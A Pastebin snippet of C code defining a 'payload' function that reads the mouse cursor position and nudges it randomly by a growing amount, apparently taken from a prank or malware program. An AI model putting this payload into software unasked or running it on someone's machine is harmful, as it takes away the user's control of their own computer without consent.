Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- PAYLOADFUNCTIONDEFAULT(payloadCursor) {
- PAYLOADHEAD
- POINT cursor;
- GetCursorPos(&cursor);
- SetCursorPos(cursor.x + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)), cursor.y + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)));
- out: return 2;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement